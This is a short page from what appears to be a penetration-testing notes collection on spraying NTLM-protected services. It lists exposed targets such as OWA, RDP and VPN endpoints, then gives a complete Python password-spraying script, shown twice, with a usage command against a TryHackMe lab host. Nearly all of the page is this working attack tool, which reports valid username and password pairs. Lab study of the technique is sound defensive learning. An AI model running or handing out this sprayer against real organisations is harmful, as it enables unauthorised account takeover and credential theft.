NTML Password Spray

Services that use NetNTLM can also be exposed to the internet. The following are some of the popular examples:

Internally-hosted Exchange (Mail) servers that expose an Outlook Web App (OWA) login portal.
Remote Desktop Protocol (RDP) service of a server being exposed to the internet.
Exposed VPN endpoints that were integrated with AD.
Web applications that are internet-facing and make use of NetNTLM.

Extracted from

Thanks to for the script:

#!/usr/bin/python3

import requests
from requests_ntlm import HttpNtlmAuth
import sys, getopt

class NTLMSprayer:
    def __init__(self, fqdn):
        self.HTTP_AUTH_FAILED_CODE = 401
        self.HTTP_AUTH_SUCCEED_CODE = 200
        self.verbose = True
        self.fqdn = fqdn

    def load_users(self, userfile):
        self.users = []
        lines = open(userfile, 'r').readlines()
        for line in lines:
            self.users.append(line.replace("\r", "").replace("\n", ""))

    def password_spray(self, password, url):
        print ("[*] Starting passwords spray attack using the following password: " + password)
        count = 0
        for user in self.users:
            response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password))
            if (response.status_code == self.HTTP_AUTH_SUCCEED_CODE):
                print ("[+] Valid credential pair found! Username: " + user + " Password: " + password)
                count += 1
                continue
            if (self.verbose):
                if (response.status_code == self.HTTP_AUTH_FAILED_CODE):
                    print ("[-] Failed login with Username: " + user)
        print ("[*] Password spray attack completed, " + str(count) + " valid credential pairs found")

def main(argv):
    userfile = ''
    fqdn = ''
    password = ''
    attackurl = ''

    try:
        opts, args = getopt.getopt(argv, "hu:f:p:a:", ["userfile=", "fqdn=", "password=", "attackurl="])
    except getopt.GetoptError:
        print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
        sys.exit(2)

    for opt, arg in opts:
        if opt == '-h':
            print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
            sys.exit()
        elif opt in ("-u", "--userfile"):
            userfile = str(arg)
        elif opt in ("-f", "--fqdn"):
            fqdn = str(arg)
        elif opt in ("-p", "--password"):
            password = str(arg)
        elif opt in ("-a", "--attackurl"):
            attackurl = str(arg)

    if (len(userfile) > 0 and len(fqdn) > 0 and len(password) > 0 and len(attackurl) > 0):
        #Start attack
        sprayer = NTLMSprayer(fqdn)
        sprayer.load_users(userfile)
        sprayer.password_spray(password, attackurl)
        sys.exit()
    else:
        print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>")
        sys.exit(2)

if __name__ == "__main__":
    main(sys.argv[1:])

python3 ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p 'ThisIsMyPasswd' -a http://ntlmauth.za.tryhackme.com

PreviousTGT NextLDAP Authentication

Last updated 6 months ago

#!/usr/bin/python3 import requests from requests_ntlm import HttpNtlmAuth import sys, getopt class NTLMSprayer: def __init__(self, fqdn): self.HTTP_AUTH_FAILED_CODE = 401 self.HTTP_AUTH_SUCCEED_CODE = 200 self.verbose = True self.fqdn = fqdn def load_users(self, userfile): self.users = [] lines = open(userfile, 'r').readlines() for line in lines: self.users.append(line.replace("\r", "").replace("\n", "")) def password_spray(self, password, url): print ("[*] Starting passwords spray attack using the following password: " + password) count = 0 for user in self.users: response = requests.get(url, auth=HttpNtlmAuth(self.fqdn + "\\" + user, password)) if (response.status_code == self.HTTP_AUTH_SUCCEED_CODE): print ("[+] Valid credential pair found! Username: " + user + " Password: " + password) count += 1 continue if (self.verbose): if (response.status_code == self.HTTP_AUTH_FAILED_CODE): print ("[-] Failed login with Username: " + user) print ("[*] Password spray attack completed, " + str(count) + " valid credential pairs found") def main(argv): userfile = '' fqdn = '' password = '' attackurl = '' try: opts, args = getopt.getopt(argv, "hu:f:p:a:", ["userfile=", "fqdn=", "password=", "attackurl="]) except getopt.GetoptError: print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>") sys.exit(2) for opt, arg in opts: if opt == '-h': print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>") sys.exit() elif opt in ("-u", "--userfile"): userfile = str(arg) elif opt in ("-f", "--fqdn"): fqdn = str(arg) elif opt in ("-p", "--password"): password = str(arg) elif opt in ("-a", "--attackurl"): attackurl = str(arg) if (len(userfile) > 0 and len(fqdn) > 0 and len(password) > 0 and len(attackurl) > 0): #Start attack sprayer = NTLMSprayer(fqdn) sprayer.load_users(userfile) sprayer.password_spray(password, attackurl) sys.exit() else: print ("ntlm_passwordspray.py -u <userfile> -f <fqdn> -p <password> -a <attackurl>") sys.exit(2) if __name__ == "__main__": main(sys.argv[1:])